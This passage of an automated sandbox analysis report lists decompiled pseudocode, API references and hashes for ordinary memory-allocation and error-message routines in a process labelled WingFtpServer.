                                                                                                                                                                                                  0x03aa5eba
                                                                                                                                                                                                  0x03aa5ec4
                                                                                                                                                                                                  0x03aa5eca
                                                                                                                                                                                                  0x03aa5ed1
                                                                                                                                                                                                  0x03aa5ed5
                                                                                                                                                                                                  0x03aa5e7c
                                                                                                                                                                                                  0x03aa5e7c
                                                                                                                                                                                                  0x03aa5e7f
                                                                                                                                                                                                  0x03aa5e81
                                                                                                                                                                                                  0x03aa5e84
                                                                                                                                                                                                  0x03aa5e87
                                                                                                                                                                                                  0x03aa5e89
                                                                                                                                                                                                  0x03aa5e98
                                                                                                                                                                                                  0x03aa5e9d
                                                                                                                                                                                                  0x03aa5ea0
                                                                                                                                                                                                  0x03aa5ea4
                                                                                                                                                                                                  0x03aa5ea4
                                                                                                                                                                                                  0x03aa5e20
                                                                                                                                                                                                  0x03aa5e23
                                                                                                                                                                                                  0x03aa5e26
                                                                                                                                                                                                  0x03aa5e2e
                                                                                                                                                                                                  0x03aa5e33
                                                                                                                                                                                                  0x03aa5e3a
                                                                                                                                                                                                  0x03aa5e3e
                                                                                                                                                                                                  0x03aa5e3e
                                                                                                                                                                                                  0x03aa5d14
                                                                                                                                                                                                  0x03aa5d14
                                                                                                                                                                                                  0x03aa5d16
                                                                                                                                                                                                  0x03aa5d1c
                                                                                                                                                                                                  0x03aa5d1f
                                                                                                                                                                                                  0x03aa5d28
                                                                                                                                                                                                  0x03aa5d2b
                                                                                                                                                                                                  0x03aa5d2e
                                                                                                                                                                                                  0x03aa5d31
                                                                                                                                                                                                  0x03aa5d34
                                                                                                                                                                                                  0x03aa5d37
                                                                                                                                                                                                  0x03aa5d3a
                                                                                                                                                                                                  0x03aa5d3a
                                                                                                                                                                                                  0x03aa5d3c
                                                                                                                                                                                                  0x03aa5d3d
                                                                                                                                                                                                  0x03aa5d21
                                                                                                                                                                                                  0x03aa5d21
                                                                                                                                                                                                  0x03aa5d21
                                                                                                                                                                                                  0x03aa5d23
                                                                                                                                                                                                  0x03aa5d25
                                                                                                                                                                                                  0x03aa5d26
                                                                                                                                                                                                  0x03aa5d26
                                                                                                                                                                                                  0x03aa5d1f
                                                                                                                                                                                                  0x03aa5d12

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,00000000,03AAE0AC,03AAE112,?,00000000,?,?,03AAE46D,00000000,?,00000000,03AAE96E,00000000), ref: 03AA5D86
                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,03AAE0AC,03AAE112,?,00000000,?,?,03AAE46D,00000000,?,00000000,03AAE96E), ref: 03AA5DA0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                                  • Opcode ID: 5821c6e3cb7cc4653c880ba044b62aa7717c319f1cc1bde19087bb956b7d5491
                                                                                                                                                                                                  • Instruction ID: c33fc72478b1b1361f6e2e5f95dc8d89790dc8e891bb0bfa0f085c98017c5b42
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5821c6e3cb7cc4653c880ba044b62aa7717c319f1cc1bde19087bb956b7d5491
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6271D437A05B408FD715DB6CC984B1ABBE4AB47314F1882AFD4C88B396D771C845CB99
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AC6B18 Relevance: 12.1, APIs: 8, Instructions: 97filewindowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                                                  			E03AC6B18(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char* _v8;
				long _v12;
				short _v140;
				short _v2188;
				void* _t15;
				char* _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t30;
				long _t48;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t61;
				void* _t64;

				_push(__ebx);
				_push(__esi);
				_v8 = 0;
				_push(_t64);
				_push(0x3ac6c3d);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t64 + 0xfffff778;
				_t61 = E03AC6920(_t15, __ebx,  &_v2188, __edx, __edi, __esi, 0x400);
				_t17 =  *0x3bd2480; // 0x3bd305c
				if( *_t17 == 0) {
					_t19 =  *0x3bd214c; // 0x3ab2afc
					_t11 = _t19 + 4; // 0xffed
					_t21 =  *0x3bd6634; // 0x3aa0000
					LoadStringW(E03AAC530(_t21),  *_t11,  &_v140, 0x40);
					MessageBoxW(0,  &_v2188,  &_v140, 0x2010);
				} else {
					_t30 =  *0x3bd21a0; // 0x3bd3344
					E03AA7004(E03AA75EC(_t30));
					_t48 = WideCharToMultiByte(1, 0,  &_v2188, _t61, 0, 0, 0, 0);
					_push(_t48);
					E03AAC140();
					WideCharToMultiByte(1, 0,  &_v2188, _t61, _v8, _t48, 0, 0);
					WriteFile(GetStdHandle(0xfffffff4), _v8, _t48,  &_v12, 0);
					WriteFile(GetStdHandle(0xfffffff4), 0x3ac6c58, 2,  &_v12, 0);
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x3ac6c44);
				_t57 =  *0x3ac6ae8; // 0x3ac6aec
				return E03AAC264( &_v8, _t57);
			}

















                                                                                                                                                                                                  0x03ac6b21
                                                                                                                                                                                                  0x03ac6b22
                                                                                                                                                                                                  0x03ac6b25
                                                                                                                                                                                                  0x03ac6b2a
                                                                                                                                                                                                  0x03ac6b2b
                                                                                                                                                                                                  0x03ac6b30
                                                                                                                                                                                                  0x03ac6b33
                                                                                                                                                                                                  0x03ac6b46
                                                                                                                                                                                                  0x03ac6b48
                                                                                                                                                                                                  0x03ac6b50
                                                                                                                                                                                                  0x03ac6bee
                                                                                                                                                                                                  0x03ac6bf3
                                                                                                                                                                                                  0x03ac6bf7
                                                                                                                                                                                                  0x03ac6c02
                                                                                                                                                                                                  0x03ac6c1c
                                                                                                                                                                                                  0x03ac6b56
                                                                                                                                                                                                  0x03ac6b56
                                                                                                                                                                                                  0x03ac6b60
                                                                                                                                                                                                  0x03ac6b7e
                                                                                                                                                                                                  0x03ac6b80
                                                                                                                                                                                                  0x03ac6b8f
                                                                                                                                                                                                  0x03ac6bac
                                                                                                                                                                                                  0x03ac6bc4
                                                                                                                                                                                                  0x03ac6bde
                                                                                                                                                                                                  0x03ac6bde
                                                                                                                                                                                                  0x03ac6c23
                                                                                                                                                                                                  0x03ac6c26
                                                                                                                                                                                                  0x03ac6c29
                                                                                                                                                                                                  0x03ac6c31
                                                                                                                                                                                                  0x03ac6c3c

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 03AC6920: VirtualQuery.KERNEL32(?,?,0000001C,00000000,03AC6ACC), ref: 03AC6953
                                                                                                                                                                                                    • Part of subcall function 03AC6920: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 03AC6977
                                                                                                                                                                                                    • Part of subcall function 03AC6920: GetModuleFileNameW.KERNEL32(MZP,?,00000105), ref: 03AC6992
                                                                                                                                                                                                    • Part of subcall function 03AC6920: LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 03AC6A2D
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,03AC6C3D), ref: 03AC6B79
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 03AC6BAC
                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 03AC6BBE
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 03AC6BC4
                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,03AC6C58,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 03AC6BD8
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,03AC6C58,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 03AC6BDE
                                                                                                                                                                                                  • LoadStringW.USER32(00000000,0000FFED,?,00000040), ref: 03AC6C02
                                                                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00002010), ref: 03AC6C1C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 135118572-0
                                                                                                                                                                                                  • Opcode ID: e685b2e99b0a9b7fc0de0fea8cf8ef9601a06c1b909c76134508c8d749729a4e
                                                                                                                                                                                                  • Instruction ID: f0ab086c42db4105beeb9030752a51a1fae87539366c5eb456e5b0348f37ef84
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e685b2e99b0a9b7fc0de0fea8cf8ef9601a06c1b909c76134508c8d749729a4e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E319176650304BFEB18E694CE81FEA77BCEB04700F508567B604EF6D1DA70AE408B64
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AA5EE8 Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                                                                  			E03AA5EE8(signed int __eax, signed int __edx, void* __edi) {
				signed int __ebx;
				void* __esi;
				signed int _t69;
				signed int _t78;
				signed int _t93;
				long _t94;
				void* _t100;
				signed int _t102;
				signed int _t109;
				signed int _t115;
				signed int _t123;
				signed int _t129;
				void* _t131;
				signed int _t140;
				unsigned int _t148;
				signed int _t150;
				long _t152;
				signed int _t156;
				intOrPtr _t161;
				signed int _t166;
				signed int _t170;
				unsigned int _t171;
				intOrPtr _t174;
				intOrPtr _t192;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t205;
				unsigned int _t207;
				signed int _t213;
				void* _t225;
				signed int _t227;
				signed int _t228;
				signed int _t230;
				void* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t238;
				signed int _t241;
				void* _t243;
				intOrPtr* _t244;

				_t176 = __edx;
				_t66 = __eax;
				_t166 =  *(__eax - 4);
				_t217 = __eax;
				if((_t166 & 0x00000007) != 0) {
					__eflags = _t166 & 0x00000005;
					if((_t166 & 0x00000005) != 0) {
						_pop(_t217);
						_pop(_t145);
						__eflags = _t166 & 0x00000003;
						if((_t166 & 0x00000003) == 0) {
							_push(_t145);
							_push(__eax);
							_push(__edi);
							_push(_t225);
							_t244 = _t243 + 0xffffffe0;
							_t218 = __edx;
							_t202 = __eax;
							_t69 =  *(__eax - 4);
							_t148 = (0xfffffff0 & _t69) - 0x14;
							if(0xfffffff0 >= __edx) {
								__eflags = __edx - _t148 >> 1;
								if(__edx < _t148 >> 1) {
									_t150 = E03AA596C(__edx);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t218 - 0x40a2c;
										if(_t218 > 0x40a2c) {
											_t78 = _t202 - 0x10;
											__eflags = _t78;
											 *((intOrPtr*)(_t78 + 8)) = _t218;
										}
										E03AA5528(_t202, _t218, _t150);
										E03AA5CF0(_t202, _t202, _t225);
									}
								} else {
									_t150 = __eax;
									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
								}
							} else {
								if(0xfffffff0 <= __edx) {
									_t227 = __edx;
								} else {
									_t227 = 0xbadb9d;
								}
								 *_t244 = _t202 - 0x10 + (_t69 & 0xfffffff0);
								VirtualQuery( *(_t244 + 8), _t244 + 8, 0x1c);
								if( *((intOrPtr*)(_t244 + 0x14)) != 0x10000) {
									L12:
									_t150 = E03AA596C(_t227);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t227 - 0x40a2c;
										if(_t227 > 0x40a2c) {
											_t93 = _t150 - 0x10;
											__eflags = _t93;
											 *((intOrPtr*)(_t93 + 8)) = _t218;
										}
										E03AA54F8(_t202,  *((intOrPtr*)(_t202 - 0x10 + 8)), _t150);
										E03AA5CF0(_t202, _t202, _t227);
									}
								} else {
									 *(_t244 + 0x10) =  *(_t244 + 0x10) & 0xffff0000;
									_t94 =  *(_t244 + 0x10);
									if(_t218 - _t148 >= _t94) {
										goto L12;
									} else {
										_t152 = _t227 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
										if(_t94 < _t152) {
											_t152 = _t94;
										}
										if(VirtualAlloc( *(_t244 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t244 + 0xc), _t152, 0x1000, 4) == 0) {
											goto L12;
										} else {
											_t100 = _t202 - 0x10;
											 *((intOrPtr*)(_t100 + 8)) = _t218;
											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
											_t150 = _t202;
										}
									}
								}
							}
							return _t150;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t170 = _t166 & 0xfffffff0;
						_push(__edi);
						_t205 = _t170 + __eax;
						_t171 = _t170 - 4;
						_t156 = _t166 & 0x0000000f;
						__eflags = __edx - _t171;
						_push(_t225);
						if(__edx > _t171) {
							_t102 =  *(_t205 - 4);
							__eflags = _t102 & 0x00000001;
							if((_t102 & 0x00000001) == 0) {
								L75:
								asm("adc edi, 0xffffffff");
								_t228 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
								_t207 = _t171;
								_t109 = E03AA596C(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
								_t192 = _t176;
								__eflags = _t109;
								if(_t109 == 0) {
									goto L73;
								} else {
									__eflags = _t228 - 0x40a2c;
									if(_t228 > 0x40a2c) {
										 *((intOrPtr*)(_t109 - 8)) = _t192;
									}
									_t230 = _t109;
									E03AA54F8(_t217, _t207, _t109);
									E03AA5CF0(_t217, _t207, _t230);
									return _t230;
								}
							} else {
								_t115 = _t102 & 0xfffffff0;
								_t232 = _t171 + _t115;
								__eflags = __edx - _t232;
								if(__edx > _t232) {
									goto L75;
								} else {
									__eflags =  *0x3bd305d;
									if(__eflags == 0) {
										L66:
										__eflags = _t115 - 0xb30;
										if(_t115 >= 0xb30) {
											E03AA5544(_t205);
											_t176 = _t176;
											_t171 = _t171;
										}
										asm("adc edi, 0xffffffff");
										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
										_t195 = _t232 + 4 - _t123;
										__eflags = _t195;
										if(_t195 > 0) {
											 *(_t217 + _t232 - 4) = _t195;
											 *((intOrPtr*)(_t217 - 4 + _t123)) = _t195 + 3;
											_t233 = _t123;
											__eflags = _t195 - 0xb30;
											if(_t195 >= 0xb30) {
												__eflags = _t123 + _t217;
												E03AA5584(_t123 + _t217, _t171, _t195);
											}
										} else {
											 *(_t217 + _t232) =  *(_t217 + _t232) & 0xfffffff7;
											_t233 = _t232 + 4;
										}
										_t234 = _t233 | _t156;
										__eflags = _t234;
										 *(_t217 - 4) = _t234;
										 *0x3bd3aec = 0;
										_t109 = _t217;
										L73:
										return _t109;
									} else {
										while(1) {
											asm("lock cmpxchg [0x3bd3aec], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x3bd398d;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t176 = _t176;
												_t171 = _t171;
												asm("lock cmpxchg [0x3bd3aec], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t176 = _t176;
													_t171 = _t171;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										_t129 =  *(_t205 - 4);
										__eflags = _t129 & 0x00000001;
										if((_t129 & 0x00000001) == 0) {
											L74:
											 *0x3bd3aec = 0;
											goto L75;
										} else {
											_t115 = _t129 & 0xfffffff0;
											_t232 = _t171 + _t115;
											__eflags = _t176 - _t232;
											if(_t176 > _t232) {
												goto L74;
											} else {
												goto L66;
											}
										}
									}
								}
							}
						} else {
							__eflags = __edx + __edx - _t171;
							if(__edx + __edx < _t171) {
								__eflags = __edx - 0xb2c;
								if(__edx >= 0xb2c) {
									L41:
									_t32 = _t176 + 0xd3; // 0xbff
									_t238 = (_t32 & 0xffffff00) + 0x30;
									_t174 = _t171 + 4 - _t238;
									__eflags =  *0x3bd305d;
									if(__eflags != 0) {
										while(1) {
											asm("lock cmpxchg [0x3bd3aec], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x3bd398d;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t174 = _t174;
												asm("lock cmpxchg [0x3bd3aec], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t174 = _t174;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										__eflags = 0xf;
									}
									 *(_t217 - 4) = _t156 | _t238;
									_t161 = _t174;
									_t196 =  *(_t205 - 4);
									__eflags = _t196 & 0x00000001;
									if((_t196 & 0x00000001) != 0) {
										_t131 = _t205;
										_t197 = _t196 & 0xfffffff0;
										_t161 = _t161 + _t197;
										_t205 = _t205 + _t197;
										__eflags = _t197 - 0xb30;
										if(_t197 >= 0xb30) {
											E03AA5544(_t131);
										}
									} else {
										 *(_t205 - 4) = _t196 | 0x00000008;
									}
									 *((intOrPtr*)(_t205 - 8)) = _t161;
									 *((intOrPtr*)(_t217 + _t238 - 4)) = _t161 + 3;
									__eflags = _t161 - 0xb30;
									if(_t161 >= 0xb30) {
										E03AA5584(_t217 + _t238, _t174, _t161);
									}
									 *0x3bd3aec = 0;
									return _t217;
								} else {
									__eflags = __edx - 0x2cc;
									if(__edx < 0x2cc) {
										_t213 = __edx;
										_t140 = E03AA596C(__edx);
										__eflags = _t140;
										if(_t140 != 0) {
											_t241 = _t140;
											E03AA5528(_t217, _t213, _t140);
											E03AA5CF0(_t217, _t213, _t241);
											_t140 = _t241;
										}
										return _t140;
									} else {
										_t176 = 0xb2c;
										__eflags = _t171 - 0xb2c;
										if(_t171 <= 0xb2c) {
											goto L37;
										} else {
											goto L41;
										}
									}
								}
							} else {
								L37:
								return _t66;
							}
						}
					}
				} else {
					__ebx =  *__ecx;
					__ecx =  *(__ebx + 2) & 0x0000ffff;
					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
					__eflags = __ecx - __edx;
					if(__ecx < __edx) {
						__ecx = __ecx + __ecx + 0x20;
						_push(__edi);
						__edi = __edx;
						__eax = 0;
						__ecx = __ecx - __edx;
						asm("adc eax, 0xffffffff");
						__eax = 0 & __ecx;
						__eax = (0 & __ecx) + __edx;
						__eax = E03AA596C((0 & __ecx) + __edx);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags = __edi - 0x40a2c;
							if(__edi > 0x40a2c) {
								 *(__eax - 8) = __edi;
							}
							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__edx = __eax;
							__edi = __eax;
							 *((intOrPtr*)(__ebx + 0x1c))() = E03AA5CF0(__esi, __edi, __ebp);
							__eax = __edi;
						}
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						return __eax;
					} else {
						__ebx = 0x40 + __edx * 4;
						__eflags = 0x40 + __edx * 4 - __ecx;
						if(0x40 + __edx * 4 < __ecx) {
							__ebx = __edx;
							__eax = __edx;
							__eax = E03AA596C(__edx);
							__eflags = __eax;
							if(__eax != 0) {
								__ecx = __ebx;
								__edx = __eax;
								__ebx = __eax;
								__esi = E03AA5CF0(__esi, __edi, __ebp);
								__eax = __ebx;
							}
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						} else {
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}












































                                                                                                                                                                                                  0x03aa5ee8
                                                                                                                                                                                                  0x03aa5ee8
                                                                                                                                                                                                  0x03aa5ee8
                                                                                                                                                                                                  0x03aa5ef0
                                                                                                                                                                                                  0x03aa5ef2
                                                                                                                                                                                                  0x03aa5f80
                                                                                                                                                                                                  0x03aa5f83
                                                                                                                                                                                                  0x03aa61f0
                                                                                                                                                                                                  0x03aa61f1
                                                                                                                                                                                                  0x03aa61f2
                                                                                                                                                                                                  0x03aa61f5
                                                                                                                                                                                                  0x03aa5820
                                                                                                                                                                                                  0x03aa5821
                                                                                                                                                                                                  0x03aa5822
                                                                                                                                                                                                  0x03aa5823
                                                                                                                                                                                                  0x03aa5824
                                                                                                                                                                                                  0x03aa5827
                                                                                                                                                                                                  0x03aa5829
                                                                                                                                                                                                  0x03aa5830
                                                                                                                                                                                                  0x03aa5839
                                                                                                                                                                                                  0x03aa583e
                                                                                                                                                                                                  0x03aa5925
                                                                                                                                                                                                  0x03aa5927
                                                                                                                                                                                                  0x03aa593a
                                                                                                                                                                                                  0x03aa593c
                                                                                                                                                                                                  0x03aa593e
                                                                                                                                                                                                  0x03aa5940
                                                                                                                                                                                                  0x03aa5946
                                                                                                                                                                                                  0x03aa594a
                                                                                                                                                                                                  0x03aa594a
                                                                                                                                                                                                  0x03aa594d
                                                                                                                                                                                                  0x03aa594d
                                                                                                                                                                                                  0x03aa5956
                                                                                                                                                                                                  0x03aa595d
                                                                                                                                                                                                  0x03aa595d
                                                                                                                                                                                                  0x03aa5929
                                                                                                                                                                                                  0x03aa5929
                                                                                                                                                                                                  0x03aa592e
                                                                                                                                                                                                  0x03aa592e
                                                                                                                                                                                                  0x03aa5844
                                                                                                                                                                                                  0x03aa584d
                                                                                                                                                                                                  0x03aa5853
                                                                                                                                                                                                  0x03aa584f
                                                                                                                                                                                                  0x03aa584f
                                                                                                                                                                                                  0x03aa584f
                                                                                                                                                                                                  0x03aa585f
                                                                                                                                                                                                  0x03aa586e
                                                                                                                                                                                                  0x03aa587b
                                                                                                                                                                                                  0x03aa58eb
                                                                                                                                                                                                  0x03aa58f2
                                                                                                                                                                                                  0x03aa58f4
                                                                                                                                                                                                  0x03aa58f6
                                                                                                                                                                                                  0x03aa58f8
                                                                                                                                                                                                  0x03aa58fe
                                                                                                                                                                                                  0x03aa5902
                                                                                                                                                                                                  0x03aa5902
                                                                                                                                                                                                  0x03aa5905
                                                                                                                                                                                                  0x03aa5905
                                                                                                                                                                                                  0x03aa5915
                                                                                                                                                                                                  0x03aa591c
                                                                                                                                                                                                  0x03aa591c
                                                                                                                                                                                                  0x03aa587d
                                                                                                                                                                                                  0x03aa587d
                                                                                                                                                                                                  0x03aa5889
                                                                                                                                                                                                  0x03aa588f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5891
                                                                                                                                                                                                  0x03aa58a2
                                                                                                                                                                                                  0x03aa58a6
                                                                                                                                                                                                  0x03aa58a8
                                                                                                                                                                                                  0x03aa58a8
                                                                                                                                                                                                  0x03aa58be
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa58d6
                                                                                                                                                                                                  0x03aa58d8
                                                                                                                                                                                                  0x03aa58db
                                                                                                                                                                                                  0x03aa58e4
                                                                                                                                                                                                  0x03aa58e7
                                                                                                                                                                                                  0x03aa58e7
                                                                                                                                                                                                  0x03aa58be
                                                                                                                                                                                                  0x03aa588f
                                                                                                                                                                                                  0x03aa587b
                                                                                                                                                                                                  0x03aa596b
                                                                                                                                                                                                  0x03aa61fb
                                                                                                                                                                                                  0x03aa61fb
                                                                                                                                                                                                  0x03aa61fd
                                                                                                                                                                                                  0x03aa61fd
                                                                                                                                                                                                  0x03aa5f89
                                                                                                                                                                                                  0x03aa5f8b
                                                                                                                                                                                                  0x03aa5f8e
                                                                                                                                                                                                  0x03aa5f8f
                                                                                                                                                                                                  0x03aa5f92
                                                                                                                                                                                                  0x03aa5f95
                                                                                                                                                                                                  0x03aa5f98
                                                                                                                                                                                                  0x03aa5f9a
                                                                                                                                                                                                  0x03aa5f9b
                                                                                                                                                                                                  0x03aa60b0
                                                                                                                                                                                                  0x03aa60b3
                                                                                                                                                                                                  0x03aa60b5
                                                                                                                                                                                                  0x03aa61a8
                                                                                                                                                                                                  0x03aa61b3
                                                                                                                                                                                                  0x03aa61ba
                                                                                                                                                                                                  0x03aa61bc
                                                                                                                                                                                                  0x03aa61bf
                                                                                                                                                                                                  0x03aa61c4
                                                                                                                                                                                                  0x03aa61c5
                                                                                                                                                                                                  0x03aa61c7
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa61c9
                                                                                                                                                                                                  0x03aa61c9
                                                                                                                                                                                                  0x03aa61cf
                                                                                                                                                                                                  0x03aa61d1
                                                                                                                                                                                                  0x03aa61d1
                                                                                                                                                                                                  0x03aa61d4
                                                                                                                                                                                                  0x03aa61dc
                                                                                                                                                                                                  0x03aa61e3
                                                                                                                                                                                                  0x03aa61ee
                                                                                                                                                                                                  0x03aa61ee
                                                                                                                                                                                                  0x03aa60bb
                                                                                                                                                                                                  0x03aa60bb
                                                                                                                                                                                                  0x03aa60be
                                                                                                                                                                                                  0x03aa60c1
                                                                                                                                                                                                  0x03aa60c3
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa60c9
                                                                                                                                                                                                  0x03aa60c9
                                                                                                                                                                                                  0x03aa60d0
                                                                                                                                                                                                  0x03aa612d
                                                                                                                                                                                                  0x03aa612d
                                                                                                                                                                                                  0x03aa6132
                                                                                                                                                                                                  0x03aa6138
                                                                                                                                                                                                  0x03aa613d
                                                                                                                                                                                                  0x03aa613e
                                                                                                                                                                                                  0x03aa613e
                                                                                                                                                                                                  0x03aa614a
                                                                                                                                                                                                  0x03aa615b
                                                                                                                                                                                                  0x03aa6161
                                                                                                                                                                                                  0x03aa6161
                                                                                                                                                                                                  0x03aa6163
                                                                                                                                                                                                  0x03aa6170
                                                                                                                                                                                                  0x03aa6177
                                                                                                                                                                                                  0x03aa617b
                                                                                                                                                                                                  0x03aa617d
                                                                                                                                                                                                  0x03aa6183
                                                                                                                                                                                                  0x03aa6185
                                                                                                                                                                                                  0x03aa6187
                                                                                                                                                                                                  0x03aa6187
                                                                                                                                                                                                  0x03aa6165
                                                                                                                                                                                                  0x03aa6165
                                                                                                                                                                                                  0x03aa6169
                                                                                                                                                                                                  0x03aa6169
                                                                                                                                                                                                  0x03aa618c
                                                                                                                                                                                                  0x03aa618c
                                                                                                                                                                                                  0x03aa618e
                                                                                                                                                                                                  0x03aa6191
                                                                                                                                                                                                  0x03aa6198
                                                                                                                                                                                                  0x03aa619a
